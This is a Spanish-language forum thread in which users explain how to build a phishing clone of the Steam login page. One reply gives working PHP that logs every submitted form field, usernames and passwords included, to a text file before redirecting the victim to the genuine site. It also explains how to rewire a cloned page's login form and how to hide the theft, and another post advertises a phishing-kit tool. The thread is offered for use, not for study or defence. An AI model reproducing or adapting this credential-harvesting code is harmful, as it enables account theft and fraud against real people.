![]() |
|
|||||||
|
|
|
Share | LinkBack | Herramientas | Desplegado |
|
|
#1 |
|
Junior Member
|
Hola amigos, me gustaria poner esta duda, k muxa gente tendra, alguien me diria como crear un Steam? por ejemplo de la pag web, [Solo usuarios registrados pueden ver los links. ]
Utilizo 3 programas: dreamweaver, wampmanager, y el teleport ultra, si alguien k sepa de esto me diria como crearlo k me diga algun tutorial o k me explique , muxas gracias con antelacion. |
|
|
|
|
|
#2 |
|
Member
|
para hacer un scam o fake lo unico que necesitas es el bloc de notas, el script del PHP y la pagina que vas a clonar.
|
|
|
|
|
|
#3 |
|
Senior Member
|
normalmente solo haces un php como este:
Código:
<?php
$handle = fopen("archivodondeguardaslascuentas.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
header ('Location: http://www.páginaverdadera.com/login.php ');
exit;
?>
y el el html del login solo buscas una línea parecida a esta: <form name="loginForm" id="loginForm" method="post" action="signup.php" y cambias signup.php por "save.php". y listo... el unico problema con ese scam es que una vez se loguea la victima lo redirecciona a la página verdadera y tiene que volver a meter sus datos (eso es algo sospechoso). pero si sabes un poco más puedes hacer que el scam envíe todos los datos a la página verdadera y se loguee a la primera. saludos kj |
|
|
|
|
|
#4 |
|
Junior Member
|
vale te entiendo todo pero cuando ya lo tengo eso creado y introduzco poer elemplo el nombre de usuario y pass y le doy a login, donde se me guardan los datos?
|
|
|
|
|
|
#5 |
|
Member
|
en un txt
con el nombre ejemplo: archivodondeguardaslascuentas.txt busca un archivo txt entrado a tu FTP y ahi esta |
|
|
|
|
|
#6 |
|
Banned
|
Puedes usar mi Phishing Creator para hacer todo mas agilmente
|
|
|
|
|
|
#7 |
|
Lector
|
Ojo actualmente los hostings gratuitos ya no permiten subir scam's
|
|
|
|
|
|
#8 |
|
Junior Member
|
Gracias por contestar pero alguien me diria como usar el Phising Creator? y para que sirve?
|
|
|
|
![]() |
| Etiquetas |
| crear, scam, tutorial |
| Herramientas | |
| Desplegado | |
|
|